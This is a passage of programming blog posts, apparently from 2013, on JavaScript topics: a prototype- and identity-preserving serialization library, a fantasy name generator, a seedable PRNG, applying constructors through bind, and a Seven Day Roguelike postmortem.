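To give a rough idea of what relinking involves, here is a sketch that rebuilds an object from parsed data carrying a # name. The constructors table and the relink function are assumptions for illustration. ResurrectJS may well resolve names and restore prototypes differently.

```javascript
function Greeter(name) {
    this.name = name;
}
Greeter.prototype.greet = function() {
    return "Hello, my name is " + this.name;
};

// Hypothetical registry mapping constructor names to constructors.
var constructors = {Greeter: Greeter};

// Create an object on the named constructor's prototype, then copy
// over the parsed properties (including "#" itself).
function relink(data) {
    var object = Object.create(constructors[data['#']].prototype);
    Object.keys(data).forEach(function(key) {
        object[key] = data[key];
    });
    return object;
}

var revived = relink(JSON.parse('{"#":"Greeter","name":"Kelsey"}'));
revived.greet();            // => "Hello, my name is Kelsey"
revived instanceof Greeter; // => true
```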

What’s special now, which I didn’t need in my game, is that identity, including circularity, is properly maintained! For example,

var necromancer = new Resurrect();
string = necromancer.stringify([kelsey, kelsey]);
// => '[[{"#":1},{"#":1}],{"#":"Greeter","name":"Kelsey"}]'

var array = necromancer.resurrect(string);
array[0] === array[1];
// => true

The encoding should begin to reveal itself now. There’s only one Greeter object serialized and two {'#': 1} objects — references into the top-level array.

Identity and Equality Review

Just to make sure everyone’s on the same page I’m going to go over the difference between identity and equality. Identity is referential: testing for it is effectively comparing memory pointers. Equality is structural: testing for it walks the structures recursively.

In JavaScript the === operator tests equality for primitive values (numbers, strings) and identity for objects.

2 === 2;
// true, these values are equal

({foo: 2} === {foo: 2});
// false, these are equal but different object instances

JavaScript has no operator for testing object equality and writing a function to do the job is surprisingly complicated. Underscore.js has such a function and it’s about 100 lines of code.

JSON maintains object equality but not object identity. Due to the former it can be used to fake an equality test.

Object.prototype.equals = function(that) {
    return JSON.stringify(this) === JSON.stringify(that);
};

({foo: 2}).equals({foo: 2});
// => true

However, keys are encoded in insertion order, so this is really fragile. Bencode would be better suited (sorted keys), except that it supports few of JavaScript’s types.

({a: 1, b: 2}).equals({b: 2, a: 1});
// => false (incorrect), due to ordering
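One way around the ordering problem, sketched here under the assumption that the data is JSON-compatible and free of cycles, is to serialize with sorted keys before comparing. The canonical and equals functions are made-up names, and equals is a standalone function rather than an Object.prototype extension.

```javascript
// Serialize with object keys in sorted order so that insertion order
// no longer affects the result. JSON-compatible, acyclic data only.
function canonical(value) {
    if (Array.isArray(value)) {
        return '[' + value.map(canonical).join(',') + ']';
    } else if (value !== null && typeof value === 'object') {
        return '{' + Object.keys(value).sort().map(function(key) {
            return JSON.stringify(key) + ':' + canonical(value[key]);
        }).join(',') + '}';
    } else {
        return JSON.stringify(value);
    }
}

function equals(a, b) {
    return canonical(a) === canonical(b);
}

equals({a: 1, b: 2}, {b: 2, a: 1});         // => true
equals({a: [1, {x: 2}]}, {a: [1, {x: 3}]}); // => false
```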

ResurrectJS extends JSON to maintain identity as well as equality across serialization. It does so through the use of references, as explained below.

In functional languages, such as Haskell or most of Clojure, there is little to no practical distinction between these two concepts. When objects are immutable it makes no difference to a program if they are identical. Everything is a value.

Serialization Algorithm

The clever algorithm used by ResurrectJS was thought up by Brian while I was discussing the problem with him. Unlike HydrateJS, the serialized form doesn’t follow the original structure’s form. While walking the data structure, copies of objects are placed into an array as they’re visited. When an object is first seen, it is tagged with an #id property corresponding to the copy’s position in the array. If we come across an object with a non-null #id we know we’ve seen it before and skip over it.

Most importantly, these copies don’t actually have any direct references to other objects. Instead these properties are replaced with references to objects in other positions in the array. Primitive, non-object values aren’t referenced like this. They’re left in place and encoded as part of the object copy.

I’m using the word “object” broadly here to include Arrays. Objects and Arrays are composite and everything else is an atom/value. Composites are things that are made up of atoms, so they need to be taken apart before serialization.

When walking the data structure is complete, the program walks the copy array and sets the #id properties of the original objects to null. This prevents them from being mistaken as already-visited by future ResurrectJS walks (and this was one of HydrateJS’s flaws). If the cleanup config option is set to true, these #id properties are completely removed with delete, which has performance implications for those objects.

Finally, the copy array is serialized by JSON.stringify(). That’s it! Because objects are identified by their position in the copy array they don’t need identifiers attached to them when encoded.
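The walk can be sketched compactly. This is a simplified illustration, not the library's code: it tracks visited objects in a Map instead of tagging them with #id, it ignores prototypes and special values, and it assumes the root is an object or array. The serialize name is hypothetical.

```javascript
function serialize(root) {
    var copies = [];       // the copy array
    var seen = new Map();  // original object -> index in the copy array

    function visit(value) {
        if (value === null || typeof value !== 'object') {
            return value;  // atoms are left in place
        }
        if (!seen.has(value)) {
            var copy = Array.isArray(value) ? [] : {};
            seen.set(value, copies.length);
            copies.push(copy);  // claim the slot before recursing
            Object.keys(value).forEach(function(key) {
                copy[key] = visit(value[key]);
            });
        }
        // Composites are always replaced by a reference.
        return {'#': seen.get(value)};
    }

    visit(root);
    return JSON.stringify(copies);
}

var person = {name: 'Kelsey'};
serialize([person, person]);
// => '[[{"#":1},{"#":1}],{"name":"Kelsey"}]'

var loop = [];
loop.push(loop);
serialize(loop);
// => '[[{"#":0}]]'
```

Claiming the slot before recursing is what lets a circular structure refer back to an object that is still being copied.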

In the array example above {'#': 1} is a reference to the second object in the copy array. The first object in the copy array is the original array being serialized. For example, here’s a circular reference,

var circle = [];
circle.push(circle);
necromancer.stringify(circle);
// => '[[{"#":0}]]'

The first object in the copy array is an array that contains a reference to itself.

JSON doesn’t support undefined but I get it for free with this scheme: any time I come across undefined I replace it with a reference to the object at index -1. This will always be undefined!

string = necromancer.stringify([undefined]);
// => '[[{"#":-1}]]'

Deserialization

To deserialize, the string is parsed as regular JSON resulting in the final copy array, which is walked. Prototypes are properly linked and references are replaced with the appropriate object from the array. The first object in the array is the root of the data structure (the very first object seen during serialization), so it is returned as the result. Simple!
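The reverse direction is even shorter. This sketch handles only the reference part (no prototypes or special values) and takes its input as string literals in the format shown earlier. The deserialize name is hypothetical.

```javascript
function deserialize(string) {
    var copies = JSON.parse(string);
    copies.forEach(function(copy) {
        Object.keys(copy).forEach(function(key) {
            var value = copy[key];
            // Inside a copy, any object-valued property is a reference.
            if (value !== null && typeof value === 'object') {
                copy[key] = copies[value['#']];
            }
        });
    });
    return copies[0];  // the first object is the root
}

var pair = deserialize('[[{"#":1},{"#":1}],{"name":"Kelsey"}]');
pair[0] === pair[1]; // => true, identity is preserved
pair[0].name;        // => "Kelsey"

var ring = deserialize('[[{"#":0}]]');
ring[0] === ring;    // => true, circularity is preserved
```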

Special Values

ResurrectJS handles Dates automatically, treating them as atomic values.

var object = {date: new Date(Math.pow(10, 12))};
string = necromancer.stringify(object);
// => '[{"date":{"#.":"Date","#v":["2001-09-09T01:46:40.000Z"]}}]'

necromancer.resurrect(string).date.toString();
// => "Sat Sep 08 2001 21:46:40 GMT-0400 (EDT)"

When the program comes across one of these special values, a “constructor” object is placed in the copy. On deserialization, not only are references restored, but special values are also reconstructed. The #. field indicates the constructor and the #v field provides the constructor’s arguments as an array. Applying a constructor was a non-trivial issue.
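As a rough illustration of how such a “constructor” object could be turned back into a value, here is a sketch using the bind trick from Applying Constructors in JavaScript. The constructors table and the revive function are hypothetical names for this example; how ResurrectJS actually looks up constructors may differ.

```javascript
// Hypothetical lookup table of constructors allowed during revival.
var constructors = {Date: Date, RegExp: RegExp};

function revive(special) {
    var name = special['#.'];
    if (!Object.prototype.hasOwnProperty.call(constructors, name)) {
        throw new Error('Unknown constructor: ' + name);
    }
    // bind's first argument (the context) is ignored by new, so pass null.
    var args = [null].concat(special['#v']);
    var Factory = Function.prototype.bind.apply(constructors[name], args);
    return new Factory();
}

revive({'#.': 'RegExp', '#v': ['abc', 'i']}).test('abC');
// => true
revive({'#.': 'Date', '#v': ['2001-09-09T01:46:40.000Z']}).getTime();
// => 1000000000000
```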

A consequence of treating Dates as values is that ResurrectJS doesn’t maintain their identity. Having the same Date in two places on a data structure will result in two different date objects after deserialization.

var date = new Date();
string = necromancer.stringify([date, date]);
array = necromancer.resurrect(string);
array[0] === array[1];
// => false

If the user was intending on mutating the Date and having it update Dates (the same one) elsewhere in the structure, this will break it. In my opinion, people mutating Dates deserve whatever is coming to them.

Here’s a RegExp being serialized,

string = necromancer.stringify(/abc/i);
// => '{"#.":"RegExp","#v":["abc","i"]}'

necromancer.resurrect(string).test('abC');
// => true

If you were watching carefully you might notice there’s no wrapper array. If an atomic value is stringified directly then the copy array process is not performed.

Here’s one of the most interesting values to serialize: a DOM element.

var h1 = document.createElement('h1');
h1.innerHTML = 'Hello';
string = necromancer.stringify(h1);
// => '{"#.":"Resurrect.Node","#v":["Hello"]}'

document.body.appendChild(necromancer.resurrect(string));
// (the heading appears on the page)

It uses XMLSerializer to serialize the DOM element into XML. The counterpart to XMLSerializer is DOMParser, but, unfortunately, DOMParser is near useless. Instead I create a wrapper div, shove the string in as innerHTML, and pull the DOM element out. It works beautifully.

Configuration

The Resurrect constructor accepts a configuration object. Check the documentation for all of the details. It lets you control the prefix used for the intrusive property names, in case you need # for yourself. You can control prototype relinking and post-serialization cleanup, as mentioned before.

necromancer = new Resurrect({
    prefix: '__',
    cleanup: true,
    revive: false
});

I’m really quite proud of how this library turned out. As far as I know it’s the only library that can actually do all this. It’s tempting to pull it into Skewer so that it can transmit data structures between Emacs Lisp and JavaScript as perfectly as possible, but I’m afraid that the properties I’m adding during serialization are too intrusive.

JavaScript Fantasy Name Generator

2013-03-27T00:00:00Z

Also in preparation for my 7-day roguelike I rewrote the RingWorks fantasy name generator in JavaScript. It’s my third implementation of this generator and this one is also the most mature by far.

Try it out by playing with the demo (GitHub).

The first implementation was written in Perl. It worked by interpreting the template string each time a name was to be generated. This was incredibly slow, partly because of the needless re-parsing, but mostly because the parser library I used had really poor performance. It’s literally millions of times slower than this new JavaScript implementation.

The second implementation I did in Emacs Lisp. I didn’t actually write a parser. Instead, an s-expression is walked and interpreted for each name generation. Much faster, but I missed having the template syntax.

The JavaScript implementation has a template compiler. There are five primitive name generator prototypes — including strings themselves, because anything with a toString() method can be a name generator — which the compiler composes into a composite generator following the template. The neatest part is that it’s an optimizing compiler, using the smallest composition of generators possible. If a template can only emit one possible pattern, the compiler will try to return a string of exactly the one possible output.

typeof NameGen.compile('(foo) (bar)');
// => "string"

Here’s the example usage I have in the documentation. On my junk laptop it can generate a million names for this template in just under a second.

var generator = NameGen.compile("sV'i");
generator.toString();  // => "entheu'loaf"
generator.toString();  // => "honi'munch"

However, in this case there aren’t actually that many possible outputs. How do I know? You can ask the generator about what it can generate. Generators know quite a bit about themselves!

generator.combinations();
// => 118910

var foobar = NameGen.compile('(foo|bar)');
foobar.combinations();
// => 2
foobar.enumerate(); // List all possible outputs.
// => ["foo", "bar"]
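One way a composite generator could answer these questions about itself is sketched below. The Choice and Sequence types are hypothetical stand-ins, not the library's actual prototypes: an alternation sums the counts of its options, and a sequence multiplies the counts of its parts. Plain strings count as one output each.

```javascript
// Hypothetical generator types for illustration only.
function count(g) { return typeof g === 'string' ? 1 : g.combinations(); }
function list(g) { return typeof g === 'string' ? [g] : g.enumerate(); }

function Choice(options) { this.options = options; }
Choice.prototype.combinations = function() {
    return this.options.reduce(function(sum, g) {
        return sum + count(g);
    }, 0);
};
Choice.prototype.enumerate = function() {
    return this.options.reduce(function(all, g) {
        return all.concat(list(g));
    }, []);
};

function Sequence(parts) { this.parts = parts; }
Sequence.prototype.combinations = function() {
    return this.parts.reduce(function(product, g) {
        return product * count(g);
    }, 1);
};
Sequence.prototype.enumerate = function() {
    return this.parts.reduce(function(prefixes, g) {
        var suffixes = list(g);
        var result = [];
        prefixes.forEach(function(prefix) {
            suffixes.forEach(function(suffix) {
                result.push(prefix + suffix);
            });
        });
        return result;
    }, ['']);
};

var title = new Sequence([
    new Choice(['foo', 'bar']), ' the ', new Choice(['a', 'b', 'c'])
]);
title.combinations();
// => 6
title.enumerate()[0];
// => "foo the a"
```

Note that this counts patterns, so two options that happen to emit the same text are counted twice.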

After some experience using it in Disc RL I found that it would be really useful to be able to mark parts of the output to be capitalized. Without this, capitalization is awkwardly separate metadata. So I extended the original syntax to do this. Prefix anything with an exclamation point and it gets capitalized in the output.

For example, here’s a template I find amusing. There are 5,113,130 possible output names.

!BsV (the) !i

Here are some of the interesting output names.

Quisey the Dork
Cunda the Snark
Strisia the Numb
Pustie the Dolt
Blhatau the Clown

Mostly as an exercise, I also added tilde syntax, which reverses the component that follows it. So ~(foobar) will always emit raboof. I don’t think this is particularly useful but having it opens the door for other similar syntax extensions.

If you’re making a procedurally generated game in JavaScript, consider using this library for name generation!

A Seedable JavaScript PRNG

2013-03-25T00:00:00Z

In preparation for my 7-day roguelike, I developed a seedable pseudo-random number generator library. Half of it is basically a port of BrianScheme’s PRNG.

JavaScript comes with an automatically-seeded global uniform PRNG, Math.random(). This is suitable for most purposes, but if repeatability and isolation are desired, such as when generating a roguelike dungeon, it’s inadequate. I also wanted to be able to sample from different probability distributions, particularly the normal distribution and the exponential distribution.

The underlying number generator is the elegant RC4. Seeds are strings and anything else (except functions) is run through JSON.stringify(). Characters above code 255 are treated as two-byte values. If no seed is provided it will grab some of the available entropy for the job. To generate a uniform random double-precision value, 7 bytes (56 bits) are generated to account for the full 53-bit mantissa.
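Here is a sketch of how 7 bytes might be packed into a uniform double. The function name uniformFromBytes and the nextByte callback are hypothetical, and dropping the low 3 bits of the last byte is my own assumption to keep the result exactly representable and strictly below 1; the library may combine the bytes differently.

```javascript
// Hypothetical sketch: build a double in [0, 1) from 7 bytes.
// nextByte is any function returning an integer from 0 to 255.
function uniformFromBytes(nextByte) {
    var value = 0;
    for (var i = 0; i < 6; i++) {
        value = value * 256 + nextByte();  // first 48 bits
    }
    // Keep only the top 5 bits of the seventh byte: 48 + 5 = 53 bits,
    // which fits exactly in a double's mantissa.
    value = value * 32 + (nextByte() >> 3);
    return value / Math.pow(2, 53);
}

uniformFromBytes(function() { return 0; });
// => 0
```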

All other distributions sample from the uniform number generator, so bits are twiddled in only one place. Moreover, it means that Math.random() can be used as the core random number generator. My RC4 implementation is about 10x slower than V8’s Math.random(), so if all you care about is the probability distributions, not the seeding, then you could benefit from better performance. Just provide Math.random as the “seed”.
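To illustrate how other distributions can be layered on a uniform source, here is a sketch using two textbook methods: inverse transform sampling for the exponential distribution and the Box-Muller transform for the normal distribution. The function names are hypothetical and the library may well use different algorithms; the point is only that each takes a uniform function, such as Math.random, as its sole source of randomness.

```javascript
// Hypothetical helpers; uniform is any function returning a value in [0, 1).

// Exponential distribution (rate 1) via inverse transform sampling.
function exponential(uniform) {
    return -Math.log(1 - uniform());
}

// Standard normal distribution via the Box-Muller transform.
function normal(uniform) {
    var u1 = 1 - uniform();  // in (0, 1], avoids log(0)
    var u2 = uniform();
    return Math.sqrt(-2 * Math.log(u1)) * Math.cos(2 * Math.PI * u2);
}

// Any uniform generator can be plugged in, including the built-in one.
var sample = normal(Math.random);
```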

Here’s an example of it in action. I’m seeding it with an arbitrary object and generating six normally-distributed values. The output should be exactly the same no matter what JavaScript engine is used.

(function(array, n) {
    var rng = new RNG({foo: 'bar'});
    for (var i = 0; i < n; i++) {
        array.push(parseFloat(rng.normal().toFixed(4)));
    }
    return array;
}([], 6));
// => [0.807, -0.9347, -1.4543, -0.2737, 0.5064, -1.7342]

Provided probability distributions:

As far as the extras go, in my game I only ended up using the exponential distribution, for generating monster-spawning events. I intended to use the normal distribution for map generation, but, to save time, I used rot.js for that purpose.

As far as testing goes, I basically just exported the output to GNU Octave so that I could eyeball the histogram and do some basic statistical checks. Everything looks reasonable, so I assume it’s implemented correctly. “That’s the problem with randomness. You can never be sure.”

Using the same seed as above, here are some histograms of the first 10,000 samples for different probability distributions.

Uniform:

Normal:

Exponential:

Gamma (mean = 4):

Applying Constructors in JavaScript

2013-03-24T00:00:00Z

I’ve split off my JavaScript serialization library, where deserialized objects maintain their prototype chain. One of the problems I ran into was applying a provided constructor function to an arbitrary number of arguments. Due to abstraction leaks in the language’s design, this turns out to be disappointingly more complicated than I thought. Fortunately there’s a portable workaround hack that works.

The goal of this article is to define a create function to replace the new operator. This function will take a constructor function and an arbitrary number of arguments for the constructor. Below, these pairs should have identical effects.

new Greeter('Kelsey');
create(Greeter, 'Kelsey');

new RegExp('abc', 'i');
create(RegExp, 'abc', 'i');

new Date(0);
create(Date, 0);

Function Application Review

Functions are full-fledged objects with their own methods, the three most important of which being call, apply, and bind. The first two invoke the function and the last one creates a new function.

call is used when a particular context (this) needs to be explicitly set. The first argument will be the context and the remaining arguments will be the normal function arguments.

function foo(a, b, c) {
    return [this, a, b, c];
}

foo.call(0, 1, "bar", 3);
// => [0, 1, "bar", 3]

foo.call(null, 1, "bar", 3);
// => [[object Window], 1, "bar", 3]
// => [null, 1, "bar", 3] (strict mode)

Normally, null and undefined cannot be passed as this: they will automatically be replaced with the global object. In strict mode, these values are passed directly as this. Also, primitive types will be boxed — wrapped in an object.
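The difference is easy to observe directly. In this small sketch the two functions are created with the Function constructor only so that the example behaves the same regardless of whether the surrounding code is strict; functions made this way are non-strict unless their body opts in.

```javascript
var sloppy = new Function('return this;');
var strict = new Function('"use strict"; return this;');

typeof sloppy.call(0);       // => "object" (0 was boxed into a Number object)
typeof strict.call(0);       // => "number"
sloppy.call(null) === null;  // => false (replaced by the global object)
strict.call(null) === null;  // => true
```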

apply is exactly like call, but the arguments are provided as an array. This is necessary for truly dynamic function calls since the arguments aren’t fixed.

foo.apply(0, [1, "bar", 3]);
// => [0, 1, "bar", 3]

Finally, bind is also like call except that it performs partial application. It returns a function with the context and initial arguments locked in place.

var bar = foo.bind(0, 1, "bar");
bar(3);
// => [0, 1, "bar", 3]

Notice how a call to bind looks like a call to call. The arguments are provided individually. What if I wanted a bind that was shaped like apply? That is, what if the arguments I want to lock in place are listed in an array? Here’s the really cool part: bind itself is a function, so it can be applied to the array of arguments.

var baz = foo.bind.apply(foo, [0, 1, "bar"]);
baz(3);
// => [0, 1, "bar", 3]

This can be a little confusing because there are two contexts being bound. The first context is the context for bind, which is the function (foo) being partially applied. The second context is this (0) being locked into place.

Manual Object Construction

To create a new object in JavaScript, the new operator is usually applied to a constructor function. How it works is generally very simple:

Create a new object with the constructor’s prototype (__proto__) as its prototype.
Apply the constructor function to this object.

The first step can be accomplished with the relatively recent Object.create() function. The second is just a normal function call.

function Greeter(name) {
    this.name = name;
}

Greeter.prototype.greet = function() {
    return "Hello, " + this.name;
};

// Standard construction with the new operator
var greeter = new Greeter('Kelsey');

greeter.greet();  // => "Hello, Kelsey"

// Manual construction with Object.create()
var manual = Object.create(Greeter.prototype);
Greeter.call(manual, 'Kelsey');

manual.greet();  // => "Hello, Kelsey"

Above, call had to be used in order to set the context of the call. Similarly, if there’s an array of arguments, apply could be used instead.

Greeter.apply(manual, ['Kelsey']);
manual.greet();  // => "Hello, Kelsey"

Getting it Right

The above doesn’t entirely capture everything about the new operator. Constructors are allowed to return an object (i.e. not a primitive value) other than this, and that will be the newly constructed object — even if it’s an entirely different type!

function Foo() {
    return new Greeter('Chris');
}

new Foo().greet();  // => "Hello, Chris"

Here’s the proper way to write create, assuming the language doesn’t throw a curve-ball at us in some corner case.

function create(constructor) {
    var args = Array.prototype.slice.call(arguments, 1);
    var object = Object.create(constructor.prototype);
    var result = constructor.apply(object, args);
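    // typeof null is 'object' and functions are objects too, so check both.
    if (result !== null && (typeof result === 'object' || typeof result === 'function')) {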
        return result;
    } else {
        return object;
    }
}

create(Greeter, 'Chris').greet();  // => "Hello, Chris"
create(Foo).greet();  // => "Hello, Chris"

The Abstraction Leak

The above works with any JavaScript objects defined by the developer, but, unfortunately, built in types have special privilege that complicates their construction. It does work with RegExp,

create(RegExp, 'abc', 'i').test('abC');  // => true

However, it does not work with Date or the other built in types,

create(Date, 0).toISOString(); // => TypeError

There are two reasons for this. The first is that the built in types don’t actually use the prototype chain: Object.create() cannot create built in types! Below I will use the toString method from the Object prototype to see what the runtime really thinks these types are.

function toString(object) {
    return Object.prototype.toString.call(object);
}

var fakeDate = Object.create(Date.prototype);
toString(fakeDate);  // => "[object Object]"
toString(new Date());  // => "[object Date]"

The object returned by Object.create() isn’t actually a Date object as far as the runtime is concerned. The same applies to Number, RegExp, String, etc. If you try to call any methods on these objects, it will throw a type error.

Worse, with the exception of RegExp, the built in type constructors don’t return objects either. The wrapper objects Boolean, Number, and String return the primitive version of their arguments. Date returns a primitive string.

typeof Date(0);  // "string"

So the only way to create a Date or these other built in types (except RegExp) is through the new operator. To loop back around to the original problem: we have an array of arguments and a constructor. We want to apply the constructor to the array to create a new object. The conflict is that new and apply can’t be used at the same time, so it would seem there’s no way to write a generic create function that works with built in types without explicitly making them a special case.

The Workaround

Fortunately, kybernetikos at Stack Overflow found an ingenious solution to this. We can have our cake and eat it, too. We can mix new and apply by hacking bind. It turns out to be a lot simpler than the “proper” create definition above.

function create(constructor) {
    var factory = constructor.bind.apply(constructor, arguments);
    return new factory();
}

It works with all the built in types, covering all the examples at the top of the article.

toString(create(Date, 0));  // => "[object Date]"
toString(create(RegExp, 'abc'));  // => "[object RegExp]"
create(Greeter, 'Kelsey').greet();  // => "Hello, Kelsey"

The bizarre thing here is that new still gets to break the rules. Normally, bind locks in this permanently, so that it can’t be overridden even by call. Here’s foo again demonstrating this.

function foo(a, b, c) {
    return [this, a, b, c];
}

foo.bind(100).call(0, 1, 2, 3);  // => [100, 1, 2, 3]

The factory constructor in create already has this bound, but new gets to override it anyway. Moreover (and this is really important for my purposes), the constructor name survives this process, through both the unofficial name property and toString method! Normally functions returned by bind have no name.

Greeter.bind(null).name;  // ""
create(Greeter, '').constructor.name;  // => "Greeter"

Thanks to this hack, this final version of create is essentially what I’m using in my library to reconstruct arbitrary “value” objects. I’m lucky I came across it or I really would have been stuck.

7DRL 2013 Complete

2013-03-17T00:00:00Z

As I mentioned previously, I participated in this year’s Seven Day Roguelike. It was my first time doing so. I managed to complete my roguelike within the allotted time period, though lacking many features I had originally planned. It’s an HTML5 game run entirely within the browser. You can play the final version here,

Disc RL

What Went Right

Display

The first thing I did was create a functioning graphical display. The goal was to get it into a playable state as soon as possible so that I could try ideas out as I implemented them. This was especially true because I was doing live development, adding features to the game as it was running.

The display is made up of 225 (15x15) absolutely positioned div elements. The content of each div is determined by its dynamically-set CSS classes. Generally, the type of map tile is one class (background) and the type of monster in that tile is another class (foreground). If the game had items, these would also be displayed using classes.

While I could use background-image to fill these divs with images, I decided when I started I would use no images whatsoever. Everything in the game would be drawn using CSS.

After the display was working, I was able to spend the rest of the time working entirely in game coordinates, completely forgetting all about screen coordinates. This made everything else so much simpler.

Saving

Early in the week I got my save system working. After ditching a library that wasn’t working, it only took me about 45 minutes to do this from scratch. Plugging my main data structure into it just worked. I did end up accidentally violating my assumption about non-circularity. When adding multiple dungeon levels, these levels would refer to each other, leading to circularity. I got around that with a small hack of referring to other dungeons by name, an indirect reference.

From what I’ve seen of other HTML5 roguelikes, saving state seems to be a unique feature of my roguelike. I don’t see anyone else doing it.

Combat

I think the final combat mechanics are fairly interesting. It’s all based on identity discs and corruption (see the help in the game for more information). There are two kinds of attacks that any creature in the game can do: melee (bash with your disc) and ranged (throw your disc). I created three different AIs to make use of these, bringing in four different monster classes. Note, I consider these game spoilers.

Simple: Middle-of-the-road on abilities, these guys run up and try to hit you. No ranged attacks. The strategy is to attack them with ranged as they close in, then melee them down. They’re easy and these are the monsters you see in the beginning of the game.
Brute: These guys have high health and damage (high strength), but are slow moving (low dexterity). They try to run up to you and bash you (same AI as “simple” monsters). The strategy for them is to “kite” them, keeping your distance and hitting them with ranged attacks, especially when they’re standing on corruption.
Archer: Archers are the opposite of brutes: low health, high ranged damage, and high speed. They chase you down and perform ranged attacks no matter what. The strategy for dealing with them is to break line-of-sight and wait. They’ll run up and around the corner where you can melee attack them. Since they’ll continue to use ranged attacks this leaves them wide open for melee attacks. This is due to a mechanic that monsters, including the player, can’t block attacks with their disc for one turn after they throw it.
Skirmisher: These are a hybrid of brutes and archers and are the most difficult. They have high dexterity, sometimes also high strength, and use the appropriate attack for the situation. At range they use ranged attacks, they’ll try to run away from you if you get close, and if you do manage to get up close they’ll switch to melee. Dealing with these guys depends a lot on the terrain around you. Remember to take advantage of corruption when dealing with them.

The eight final, identical bosses of the game have a slightly custom AI, making them sort of like another class on their own. They’re the “T” monsters in the screenshot above. I won’t describe it here because I still want there to be some sort of secret. :-)

Corruption

Corruption was actually something I came up with late in the week, and I’m happy with how it turned out. It makes for more interesting combat tactics (see above) and I think it really adds some flavor. Occasionally when you move over corrupted (green) tiles, you will notice the game’s interface being scrambled for a turn.

rot.js

I ended up using rot.js to handle field-of-view calculations, path finding, and dungeon generation. These are all time consuming to write and there really is no reason to implement your own for the first two. I would have liked to do my own dungeon generation, but rot.js was just so convenient for this that I decided to skip it. The downside is that my dungeons will look like the dungeons from other games.

Path finding was critical not only for monsters but also automatic exploration. Even though it’s quirky, I’m really happy with how it turned out. Personally, one of the most tiring parts of some roguelikes is just manually navigating around empty complex corridors. Good gameplay is all about a long series of interesting decisions. Choosing right or left when exploring a map is generally not an interesting decision, because there’s really no differentiating them. Auto-exploration is a useful way to quickly get the player to the next interesting decision. In my game, you generally only need to press a directional navigation key when you’re engaged in combat.

Help Screen

I’m really happy with how my overlay screens turned out, especially the keyboard styling. I’m talking about the help screen, control screen, and end-game screen. Since this is the very first thing presented to the user, I felt it was important to invest time into it. First impressions are everything.

What Went Wrong

The game is smaller than I originally planned. Monsters have unused stats and slots on them not displayed by the interface. A look at the code will reveal a lot of openings I left for functionality not actually present. I originally intended for 10 dungeon levels, but lacking a variety of monster AIs, which are time consuming to write, I ended up with 6 dungeon levels.

User Interfaces

My original healing mechanic was going to be health potions (under a different, thematic name), with no heal-over-time. As I was nearing the end of the week I still hadn’t implemented items, so this got scrapped for a heal-on-level mechanic and an easing of the leveling curve. Everything was in place for implementing items, and therefore healing potions, except for the user interface. This was a common situation: the UI being the hardest part of any new feature. Writing an inventory management interface was going to take too much time, so I dropped it.

Also dumped due to the lack of time to implement an interface for it was some kind of spell mechanic. Towards the end I did squeeze in ranged attacks, but this was out of necessity for real combat mechanics.

There’s no race (Program, User, etc.) and class (melee, ranged, etc.) selection, not even character name selection. This is really just another user interface thing.

There are no stores/merchants because these are probably the hardest interfaces of all to implement!

Game Balance

I’m also not entirely satisfied with the balance. The early game is too easy and the late game is probably too hard. The difficulty ramps up quickly in the middle. Fortunately this is probably better than the reverse: the early game is too hard and the end game is too easy. Early difficulty won’t be what’s scaring off anyone trying out the game — instead, that would be boredom! Generally if you find a level too difficult, you need to retreat to the previous level and grind out a few more levels. This turns out to be not very interesting, so there needs to be less of it.

Fixing this would take a lot more play-testing — also very time-consuming. At the end of the week I probably spent around six hours just playing legitimately (i.e. not cheating), and having fun doing so, but that still wasn’t enough. The very end of the game with the final bosses is quite challenging, so to test that part in a reasonable time-frame I had to cheat a bit.

Code Namespacing

My namespaces are messy. This was the largest freestanding (i.e. not AngularJS) JavaScript application I’ve done so far, and it’s the first one where I could really start to appreciate tighter namespace management. This led to more coupling between different systems than was strictly necessary.

I still want to avoid the classical module pattern of wrapping everything in a big closure. That’s incompatible with Skewer for one, and it would have also been incompatible with my prototype-preserving storage system. I just need to be more disciplined in containing sprawl.

However, in the end none of this really mattered one bit. No one is maintaining this code and no one will ever read it except me. At the end of the week it’s much better to have sloppy code and a working game than a clean codebase and only half of a game.

CSS Animations

Along with my no-images philosophy, I was intending to exploit CSS animations to make the map look really interesting. I wanted the glowing walls to pulsate with energy. Unfortunately adding and removing classes causes these animations to reset if reflow is allowed to occur, at least sometimes. The exact behavior is browser-dependent. All the individual tile animations would get out of sync and everything would look terrible. There is intentionally little control over this behavior, for optimization purposes, so I couldn’t fix it.

Next Year?

Will I participate again next year? Maybe. I’m really happy with the outcome this year, but I’m afraid doing the same thing again next year will feel tedious. But maybe I’ll change my mind after taking a year off from this! I wasn’t intending on participating this year, until Brian twisted my arm into it. See, peer pressure isn’t always a bad thing!

Serializing JavaScript Objects

2013-03-11T00:00:00Z

This year I’m participating in the annual Seven Day Roguelike Challenge, where participants are attempting to create their own fully-playable roguelike within seven days. My entry is called Disc RL (play), a client-side browser roguelike.

Today’s issue was saving the game state in Local Storage. Otherwise the entire game would be lost if the tab was closed or the page left for any reason. This would limit the possible depth of my game, as any time investment could easily be lost. The issue is that Local Storage only stores strings, so the game state must be serialized and deserialized by my application.

You might say, “Use JSON!” The problem is that I’m using JavaScript’s object system, including polymorphism. The actual monsters are prototypes of the various types of monsters, which are themselves prototypes of the base monster prototype. Serializing a monster with JSON.stringify() loses all this “class” information, so the deserialized object will have no behavior.

function Foo() {}

Foo.prototype.greet = function() {
    return "hello";
};

var foo1 = new Foo();
foo1.greet();
// => "hello"

var foo2 = JSON.parse(JSON.stringify(foo1));
foo2.greet();
// => TypeError: Object has no method 'greet'

Specifically what’s not being captured here is the __proto__ property of the original object. When a property is not found on the current object, __proto__ is followed to check the next object in the prototype chain, all the way up to Object. The greet() method is found on the next item in the chain.
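The lookup can be mimicked by hand to see where a property actually lives. This is only an illustrative sketch; findOwner is a hypothetical helper that walks the chain with the standard Object.getPrototypeOf().

```javascript
function Foo() {}

Foo.prototype.greet = function() {
    return "hello";
};

// Return the object in the prototype chain that owns the named property,
// or null if no object in the chain has it.
function findOwner(object, name) {
    while (object !== null) {
        if (Object.prototype.hasOwnProperty.call(object, name)) {
            return object;
        }
        object = Object.getPrototypeOf(object);
    }
    return null;
}

var foo1 = new Foo();
findOwner(foo1, 'greet') === Foo.prototype;
// => true

var foo2 = JSON.parse(JSON.stringify(foo1));
findOwner(foo2, 'greet');
// => null
```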

So the next suggestion might be, “Include __proto__ in the JSON string.” The main obstacle here is that function values cannot be serialized. More specifically, closures cannot be serialized. Closures capture their environment but there is no way to access this environment in order to serialize it. If the prototype has methods, which it likely does, it can’t be serialized.
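A quick demonstration of what JSON.stringify() does with functions: it silently drops them from objects, turns them into null inside arrays, and returns undefined when handed one directly. The monster object here is just a made-up example.

```javascript
var monster = {
    name: 'brute',
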